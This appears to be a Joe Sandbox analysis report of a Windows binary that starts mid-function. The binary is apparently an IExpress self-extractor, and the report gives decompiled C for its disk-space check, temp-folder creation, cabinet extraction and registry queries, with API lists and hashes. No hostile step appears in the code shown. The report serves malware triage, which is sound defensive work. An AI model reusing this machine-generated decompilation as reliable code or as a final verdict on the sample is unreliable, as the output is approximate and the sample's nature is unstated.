                                                          							if(_t78 < _t118) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t78 - _t118;
                                                          						if(_t78 != _t118) {
                                                          							__eflags =  *0x1099a34 & 0x00000008;
                                                          							if(( *0x1099a34 & 0x00000008) == 0) {
                                                          								L20:
                                                          								_t103 =  *0x1099a38; // 0x0
                                                          								_t110 =  *((intOrPtr*)(0x10989e0 + (_t78 & 0x0000ffff) * 4));
                                                          								L21:
                                                          								__eflags = (_v804 & 0x00000003) - 3;
                                                          								if((_v804 & 0x00000003) != 3) {
                                                          									__eflags = _v804 & 0x00000001;
                                                          									if((_v804 & 0x00000001) == 0) {
                                                          										__eflags = _t103 - _t116;
                                                          									} else {
                                                          										__eflags = _t110 - _t116;
                                                          									}
                                                          								} else {
                                                          									__eflags = _t103 + _t110 - _t116;
                                                          								}
                                                          								if(__eflags <= 0) {
                                                          									 *0x1099124 = 0;
                                                          									_t66 = 1;
                                                          								} else {
                                                          									_t66 = E0109268B(_a4, _t110, _t103,  &_v16);
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _v816 & 0x00008000;
                                                          							if((_v816 & 0x00008000) == 0) {
                                                          								goto L20;
                                                          							}
                                                          							_t105 =  *0x1099a38; // 0x0
                                                          							_t110 =  *((intOrPtr*)(0x10989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10989e0 + (_t78 & 0x0000ffff) * 4));
                                                          							_t103 = (_t105 >> 2) +  *0x1099a38;
                                                          							goto L21;
                                                          						}
                                                          						_t110 = 0x4c5;
                                                          						E010944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                          						goto L31;
                                                          					}
                                                          					memset( &_v788, 0, 0x200);
                                                          					 *0x1099124 = E01096285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          					_t110 = 0x4f9;
                                                          					goto L30;
                                                          				} else {
                                                          					_t110 = 0x4bc;
                                                          					E010944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                          					 *0x1099124 = E01096285();
                                                          					_t66 = 0;
                                                          					L33:
                                                          					return E01096CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                          				}
                                                          			}




































                                                          APIs
                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010959A8
                                                          • SetCurrentDirectoryA.KERNELBASE(?), ref: 010959AF
                                                          • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 01095A13
                                                          • MulDiv.KERNEL32(?,?,00000400), ref: 01095A40
                                                          • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01095A64
                                                          • memset.MSVCRT ref: 01095A7C
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01095A98
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 01095AA5
                                                          • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 01095BFC
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                          • String ID:
                                                          • API String ID: 4237285672-0
                                                          • Opcode ID: 8e1959767452908d3a9949a946dc28dfb8af915a06570f89641a8da35139c46a
                                                          • Instruction ID: c16a9851f7d7e7c0f2b63510265d41ee41ed08a15d76811c0cf0c42446e54776
                                                          • Opcode Fuzzy Hash: 8e1959767452908d3a9949a946dc28dfb8af915a06570f89641a8da35139c46a
                                                          • Instruction Fuzzy Hash: D27193B1A0020CAFEF269B25CCA5BFA77ACFB48344F0440AAF585D3144DA399E459F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 1094fe0-109501a call 109468f FindResourceA LoadResource LockResource 377 1095161-1095163 374->377 378 1095020-1095027 374->378 379 1095029-1095051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 1095057-109505e call 1094efd 378->380 379->380 383 109507c-10950b4 380->383 384 1095060-1095077 call 10944b9 380->384 389 10950e8-1095104 call 10944b9 383->389 390 10950b6-10950da 383->390 388 1095107-109510e 384->388 391 109511d-109511f 388->391 392 1095110-1095117 FreeResource 388->392 398 1095106 389->398 390->398 402 10950dc 390->402 394 109513a-1095141 391->394 395 1095121-1095127 391->395 392->391 400 109515f 394->400 401 1095143-109514a 394->401 395->394 399 1095129-1095135 call 10944b9 395->399 398->388 399->394 400->377 401->400 404 109514c-1095159 SendMessageA 401->404 405 10950e3-10950e6 402->405 404->400 405->389 405->398
                                                          C-Code - Quality: 77%
                                                          			E01094FE0(void* __edi, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* _t8;
                                                          				struct HWND__* _t9;
                                                          				int _t10;
                                                          				void* _t12;
                                                          				struct HWND__* _t24;
                                                          				struct HWND__* _t27;
                                                          				intOrPtr _t29;
                                                          				void* _t33;
                                                          				int _t34;
                                                          				CHAR* _t36;
                                                          				int _t37;
                                                          				intOrPtr _t47;
                                                          
                                                          				_t33 = __edi;
                                                          				_t36 = "CABINET";
                                                          				 *0x1099144 = E0109468F(_t36, 0, 0);
                                                          				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                          				 *0x1099140 = _t8;
                                                          				if(_t8 == 0) {
                                                          					return _t8;
                                                          				}
                                                          				_t9 =  *0x1098584; // 0x0
                                                          				if(_t9 != 0) {
                                                          					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                          					ShowWindow(GetDlgItem( *0x1098584, 0x841), 5);
                                                          				}
                                                          				_t10 = E01094EFD(0, 0);
                                                          				if(_t10 != 0) {
                                                          					__imp__#20(E01094CA0, E01094CC0, E01094980, E01094A50, E01094AD0, E01094B60, E01094BC0, 1, 0x1099148, _t33);
                                                          					_t34 = _t10;
                                                          					if(_t34 == 0) {
                                                          						L8:
                                                          						_t29 =  *0x1099148; // 0x0
                                                          						_t24 =  *0x1098584; // 0x0
                                                          						E010944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                          						_t37 = 0;
                                                          						L9:
                                                          						goto L10;
                                                          					}
                                                          					__imp__#22(_t34, "*MEMCAB", 0x1091140, 0, E01094CD0, 0, 0x1099140); // executed
                                                          					_t37 = _t10;
                                                          					if(_t37 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					__imp__#23(_t34); // executed
                                                          					if(_t10 != 0) {
                                                          						goto L9;
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					_t27 =  *0x1098584; // 0x0
                                                          					E010944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                          					_t37 = 0;
                                                          					L10:
                                                          					_t12 =  *0x1099140; // 0x0
                                                          					if(_t12 != 0) {
                                                          						FreeResource(_t12);
                                                          						 *0x1099140 = 0;
                                                          					}
                                                          					if(_t37 == 0) {
                                                          						_t47 =  *0x10991d8; // 0x0
                                                          						if(_t47 == 0) {
                                                          							E010944B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                          						}
                                                          					}
                                                          					if(( *0x1098a38 & 0x00000001) == 0 && ( *0x1099a34 & 0x00000001) == 0) {
                                                          						SendMessageA( *0x1098584, 0xfa1, _t37, 0);
                                                          					}
                                                          					return _t37;
                                                          				}
                                                          			}

















                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01094FFE
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 01095006
                                                          • LockResource.KERNEL32(00000000), ref: 0109500D
                                                          • GetDlgItem.USER32(00000000,00000842), ref: 01095030
                                                          • ShowWindow.USER32(00000000), ref: 01095037
                                                          • GetDlgItem.USER32(00000841,00000005), ref: 0109504A
                                                          • ShowWindow.USER32(00000000), ref: 01095051
                                                          • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 01095111
                                                          • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 01095159
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                          • String ID: *MEMCAB$CABINET
                                                          • API String ID: 1305606123-2642027498
                                                          • Opcode ID: 97161b78e21137226e353643c25778e96eaa76e76d195ad2e2803df533e79281
                                                          • Instruction ID: 00f60cad531c6dfff0cfc1002feef0167ff12ba5830af5e2d5389626bb276a70
                                                          • Opcode Fuzzy Hash: 97161b78e21137226e353643c25778e96eaa76e76d195ad2e2803df533e79281
                                                          • Instruction Fuzzy Hash: DF3115F0740305ABEF311A27ADB9F673A9CB748799F00405EB9C1E6299D67E8C01A760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 95%
                                                          			E010953A1(CHAR* __ecx, CHAR* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t5;
                                                          				long _t13;
                                                          				int _t14;
                                                          				CHAR* _t20;
                                                          				int _t29;
                                                          				int _t30;
                                                          				CHAR* _t32;
                                                          				signed int _t33;
                                                          				void* _t34;
                                                          
                                                          				_t5 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t5 ^ _t33;
                                                          				_t32 = __edx;
                                                          				_t20 = __ecx;
                                                          				_t29 = 0;
                                                          				while(1) {
                                                          					E0109171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                          					_t34 = _t34 + 0x10;
                                                          					_t29 = _t29 + 1;
                                                          					E01091680(_t32, 0x104, _t20);
                                                          					E0109658A(_t32, 0x104,  &_v268); // executed
                                                          					RemoveDirectoryA(_t32); // executed
                                                          					_t13 = GetFileAttributesA(_t32); // executed
                                                          					if(_t13 == 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					if(_t29 < 0x190) {
                                                          						continue;
                                                          					}
                                                          					L3:
                                                          					_t30 = 0;
                                                          					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                          						_t30 = 1;
                                                          						DeleteFileA(_t32);
                                                          						CreateDirectoryA(_t32, 0);
                                                          					}
                                                          					L5:
                                                          					return E01096CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                          				}
                                                          				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                          				if(_t14 == 0) {
                                                          					goto L3;
                                                          				}
                                                          				_t30 = 1;
                                                          				 *0x1098a20 = 1;
                                                          				goto L5;
                                                          			}


















                                                          APIs
                                                            • Part of subcall function 0109171E: _vsnprintf.MSVCRT ref: 01091750
                                                          • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010953FB
                                                          • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095402
                                                          • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109541F
                                                          • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109542B
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095434
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095452
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                          • API String ID: 1082909758-2310010875
                                                          • Opcode ID: f7560c7c271cc161f48cf0843876d7612bb9360c6de1bf034d4c00e3e2e64c00
                                                          • Instruction ID: 714666c20b13293f1ceca7f7a94448d332af37ba3204214bace2d4d38535b245
                                                          • Opcode Fuzzy Hash: f7560c7c271cc161f48cf0843876d7612bb9360c6de1bf034d4c00e3e2e64c00
                                                          • Instruction Fuzzy Hash: 1B110871700104A7EB619B269C68FEF7A6DFBD5321F004156B6C6D3180CE7A894297A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 478 1095467-1095484 479 109548a-1095490 call 10953a1 478->479 480 109551c-1095528 call 1091680 478->480 483 1095495-1095497 479->483 484 109552d-1095539 call 10958c8 480->484 485 109549d-10954c0 call 1091781 483->485 486 1095581-1095583 483->486 493 109553b-1095545 CreateDirectoryA 484->493 494 109554d-1095552 484->494 495 109550c-109551a call 109658a 485->495 496 10954c2-10954d8 GetSystemInfo 485->496 489 109558d-109559d call 1096ce0 486->489 498 1095577-109557c call 1096285 493->498 499 1095547 493->499 500 1095585-109558b 494->500 501 1095554-1095557 call 109597d 494->501 495->484 504 10954da-10954dd 496->504 505 10954fe 496->505 498->486 499->494 500->489 511 109555c-109555e 501->511 509 10954df-10954e2 504->509 510 10954f7-10954fc 504->510 512 1095503-1095507 call 109658a 505->512 513 10954f0-10954f5 509->513 514 10954e4-10954e7 509->514 510->512 511->500 515 1095560-1095566 511->515 512->495 513->512 514->495 517 10954e9-10954ee 514->517 515->486 518 1095568-1095575 RemoveDirectoryA 515->518 517->512 518->486
                                                          C-Code - Quality: 75%
                                                          			E01095467(CHAR* __ecx, void* __edx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _SYSTEM_INFO _v304;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t10;
                                                          				void* _t13;
                                                          				intOrPtr _t14;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				signed int _t26;
                                                          				void* _t28;
                                                          				void* _t29;
                                                          				CHAR* _t48;
                                                          				signed int _t49;
                                                          				intOrPtr _t61;
                                                          
                                                          				_t10 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t10 ^ _t49;
                                                          				_push(__ecx);
                                                          				if(__edx == 0) {
                                                          					_t48 = 0x10991e4;
                                                          					_t42 = 0x104;
                                                          					E01091680(0x10991e4, 0x104);
                                                          					L14:
                                                          					_t13 = E010958C8(_t48); // executed
                                                          					if(_t13 != 0) {
                                                          						L17:
                                                          						_t42 = _a4;
                                                          						if(_a4 == 0) {
                                                          							L23:
                                                          							 *0x1099124 = 0;
                                                          							_t14 = 1;
                                                          							L24:
                                                          							return E01096CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                          						}
                                                          						_t16 = E0109597D(_t48, _t42, 1, 0); // executed
                                                          						if(_t16 != 0) {
                                                          							goto L23;
                                                          						}
                                                          						_t61 =  *0x1098a20; // 0x0
                                                          						if(_t61 != 0) {
                                                          							 *0x1098a20 = 0;
                                                          							RemoveDirectoryA(_t48);
                                                          						}
                                                          						L22:
                                                          						_t14 = 0;
                                                          						goto L24;
                                                          					}
                                                          					if(CreateDirectoryA(_t48, 0) == 0) {
                                                          						 *0x1099124 = E01096285();
                                                          						goto L22;
                                                          					}
                                                          					 *0x1098a20 = 1;
                                                          					goto L17;
                                                          				}
                                                          				_t42 =  &_v268;
                                                          				_t20 = E010953A1(__ecx,  &_v268); // executed
                                                          				if(_t20 == 0) {
                                                          					goto L22;
                                                          				}
                                                          				_push(__ecx);
                                                          				_t48 = 0x10991e4;
                                                          				E01091781(0x10991e4, 0x104, __ecx,  &_v268);
                                                          				if(( *0x1099a34 & 0x00000020) == 0) {
                                                          					L12:
                                                          					_t42 = 0x104;
                                                          					E0109658A(_t48, 0x104, 0x1091140);
                                                          					goto L14;
                                                          				}
                                                          				GetSystemInfo( &_v304);
                                                          				_t26 = _v304.dwOemId & 0x0000ffff;
                                                          				if(_t26 == 0) {
                                                          					_push("i386");
                                                          					L11:
                                                          					E0109658A(_t48, 0x104);
                                                          					goto L12;
                                                          				}
                                                          				_t28 = _t26 - 1;
                                                          				if(_t28 == 0) {
                                                          					_push("mips");
                                                          					goto L11;
                                                          				}
                                                          				_t29 = _t28 - 1;
                                                          				if(_t29 == 0) {
                                                          					_push("alpha");
                                                          					goto L11;
                                                          				}
                                                          				if(_t29 != 1) {
                                                          					goto L12;
                                                          				}
                                                          				_push("ppc");
                                                          				goto L11;
                                                          			}





















                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010954C9
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109553D
                                                          • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109556F
                                                            • Part of subcall function 010953A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010953FB
                                                            • Part of subcall function 010953A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095402
                                                            • Part of subcall function 010953A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109541F
                                                            • Part of subcall function 010953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109542B
                                                            • Part of subcall function 010953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095434
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                          • API String ID: 1979080616-1000730752
                                                          • Opcode ID: d73618a243827f08b588861916894ae5c7771f2f82a2e3daeb534a342ea6b33f
                                                          • Instruction ID: a89338b40a6b64d7c2bb818f405d5fa6ca6206f47e455d2da243c00b75e7910a
                                                          • Opcode Fuzzy Hash: d73618a243827f08b588861916894ae5c7771f2f82a2e3daeb534a342ea6b33f
                                                          • Instruction Fuzzy Hash: F33169B0B002069BDF629F3F9C745BE77EABB85214B0441AFE9C6D3245CB75CA01A794
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 519 109256d-109257d 520 1092583-1092589 519->520 521 1092622-1092627 call 10924e0 519->521 523 10925e8-1092607 RegOpenKeyExA 520->523 524 109258b 520->524 528 1092629-109262f 521->528 525 1092609-1092620 RegQueryInfoKeyA 523->525 526 10925e3-10925e6 523->526 524->528 529 1092591-1092595 524->529 530 10925d1-10925dd RegCloseKey 525->530 526->528 529->528 531 109259b-10925ba RegOpenKeyExA 529->531 530->526 531->526 532 10925bc-10925cb RegQueryValueExA 531->532 532->530
                                                          C-Code - Quality: 86%
                                                          			E0109256D(signed int __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				signed int _t13;
                                                          				signed int _t19;
                                                          				long _t24;
                                                          				void* _t26;
                                                          				int _t31;
                                                          				void* _t34;
                                                          
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t13 = __ecx & 0x0000ffff;
                                                          				_t31 = 0;
                                                          				if(_t13 == 0) {
                                                          					_t31 = E010924E0(_t26);
                                                          				} else {
                                                          					_t34 = _t13 - 1;
                                                          					if(_t34 == 0) {
                                                          						_v8 = 0;
                                                          						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                          							goto L7;
                                                          						} else {
                                                          							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                          							goto L6;
                                                          						}
                                                          						L12:
                                                          					} else {
                                                          						if(_t34 > 0 && __ecx <= 3) {
                                                          							_v8 = 0;
                                                          							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                          							if(_t24 == 0) {
                                                          								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                          								L6:
                                                          								asm("sbb eax, eax");
                                                          								_v8 = _v8 &  !( ~_t19);
                                                          								RegCloseKey(_v12); // executed
                                                          							}
                                                          							L7:
                                                          							_t31 = _v8;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t31;
                                                          				goto L12;
                                                          			}












                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,01094096,01094096,?,01091ED3,00000001,00000000,?,?,01094137,?), ref: 010925B2
                                                          • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,01094096,?,01091ED3,00000001,00000000,?,?,01094137,?,01094096), ref: 010925CB
                                                          • RegCloseKey.KERNELBASE(?,?,01091ED3,00000001,00000000,?,?,01094137,?,01094096), ref: 010925DD
                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,01094096,01094096,?,01091ED3,00000001,00000000,?,?,01094137,?), ref: 010925FF
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,01094096,00000000,00000000,00000000,00000000,?,01091ED3,00000001,00000000), ref: 0109261A
                                                          Strings
                                                          • PendingFileRenameOperations, xrefs: 010925C3
                                                          • System\CurrentControlSet\Control\Session Manager, xrefs: 010925A8
                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010925F5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: OpenQuery$CloseInfoValue
                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                          • API String ID: 2209512893-559176071
                                                          • Opcode ID: d76eaa332dd4bb339c4711930ae3827c1ef54a2664e082bdc65468182ba934bb
                                                          • Instruction ID: 15d25a57591b98078d2dffaac648bc008fbff4f24e927dc571e92e77daf045bb
                                                          • Opcode Fuzzy Hash: d76eaa332dd4bb339c4711930ae3827c1ef54a2664e082bdc65468182ba934bb
                                                          • Instruction Fuzzy Hash: FD118635902228FB9F309B969C29DFF7EBCEF457A1F104095B989E2100D6314A44E6E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 533 1096a60-1096a91 call 1097155 call 1097208 GetStartupInfoW 539 1096a93-1096aa2 533->539 540 1096abc-1096abe 539->540 541 1096aa4-1096aa6 539->541 544 1096abf-1096ac5 540->544 542 1096aa8-1096aad 541->542 543 1096aaf-1096aba Sleep 541->543 542->544 543->539 545 1096ad1-1096ad7 544->545 546 1096ac7-1096acf _amsg_exit 544->546 548 1096ad9-1096ae9 call 1096c3f 545->548 549 1096b05 545->549 547 1096b0b-1096b11 546->547 550 1096b2e-1096b30 547->550 551 1096b13-1096b24 _initterm 547->551 555 1096aee-1096af2 548->555 549->547 553 1096b3b-1096b42 550->553 554 1096b32-1096b39 550->554 551->550 556 1096b44-1096b51 call 1097060 553->556 557 1096b67-1096b71 553->557 554->553 555->547 558 1096af4-1096b00 555->558 556->557 566 1096b53-1096b65 556->566 560 1096b74-1096b79 557->560 561 1096c39-1096c3e call 109724d 558->561 563 1096b7b-1096b7d 560->563 564 1096bc5-1096bc8 560->564 569 1096b7f-1096b81 563->569 570 1096b94-1096b98 563->570 567 1096bca-1096bd3 564->567 568 1096bd6-1096be3 _ismbblead 564->568 566->557 567->568 574 1096be9-1096bed 568->574 575 1096be5-1096be6 568->575 569->564 576 1096b83-1096b85 569->576 572 1096b9a-1096b9e 570->572 573 1096ba0-1096ba2 570->573 578 1096ba3-1096bbc call 1092bfb 572->578 573->578 574->560 580 1096c1e-1096c25 574->580 575->574 576->570 577 1096b87-1096b8a 576->577 577->570 581 1096b8c-1096b92 577->581 578->580 586 1096bbe-1096bbf exit 578->586 583 1096c32 580->583 584 1096c27-1096c2d _cexit 580->584 581->576 583->561 584->583 586->564
                                                          C-Code - Quality: 51%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int* _t25;
                                                          				signed int _t26;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				signed int _t37;
                                                          				signed char _t41;
